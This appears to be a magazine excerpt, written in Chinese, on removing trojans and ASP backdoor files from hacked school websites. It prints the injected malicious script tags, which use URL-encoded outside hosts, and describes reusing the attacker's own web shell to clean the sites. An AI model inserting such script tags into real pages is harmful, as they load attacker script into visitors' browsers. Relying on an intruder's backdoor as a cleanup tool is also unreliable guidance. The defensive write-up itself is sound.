《网管员世界2011超值精华本》第1章安全管理,本章结合笔者亲历实践,详细分析了使用这种模式建站所面临的各个层次的安全问题,并给出了相应的解决方法,特别是一些细节性的问题。本节为大家介绍清除木马和后门文件。
于是,笔者立刻备份所有网站的数据库及源代码,以便在清马后网站出现问题时还原数据。同时,备份已找到的后门文件,备份的目的在于后面将借助此后门文件对所有站点进行查马和清马等操作。
清除网页中的木马,经过分析,网页中被挂的代码要么是:
- <script src=http:// %73%70%6F%72%74
- %73%62%61%79%2E%63%6E> </script>
- <script src=http:// %74%68%65%73%6F
- %6E%2E%63%6F%6D%2E%63%6E> </script>
要么就是:
- <script src= http://%74%68%65% 73%
- 6F%6E%2E%63% 6F%6D%2E%63%6E></script>
- <script src= http://%73%70%6F% 72%
- 74%73%62%61%79% 2E%63%6E></script>
根据被挂代码的特征,我们可以采取批量清马或批量替换的方式来清除网页中的这些代码,省去了手工清除工作量大、容易出错等麻烦。
方法如下:
首先,将备份的后门文件复制到需要清马的站点下,然后通过浏览器访问该文件并登录到控制后台,单击“批量清马”按钮,打开“清马器”,将以上要清除的代码复制后粘贴到“要清的马”一栏的文本输入框中,单击“开始执行”按钮,需要被清除的代码就会从网页源代码中清除,如图7 所示。如果使用批量替换的话,就用空代码去替换要清除的代码就行了。采用同样的方法清除所有站点中的木马。
 |
| (点击查看大图)图7 批量清马局部截图 |
 |
| (点击查看大图)图8 查找文件木马的结果 |
仔细一看文件名, 正是我们之前找到的那个后门文件。按照同样的方法扫描其他站点,结果只在学校主站的AD 文件夹下扫描到一个同样提示“似乎脚本被加密了 ”的文件,同样是一个ASP 文件,文件名为220070928113427937.ASP,查看其源代码后确认此文件也是一个后门文件。最后,把前后找到的两个后门文件进行备份后,将原文件删除。
ASP 木马文件一般为加密文件,网站文件通常是不需要加密的。
发表评论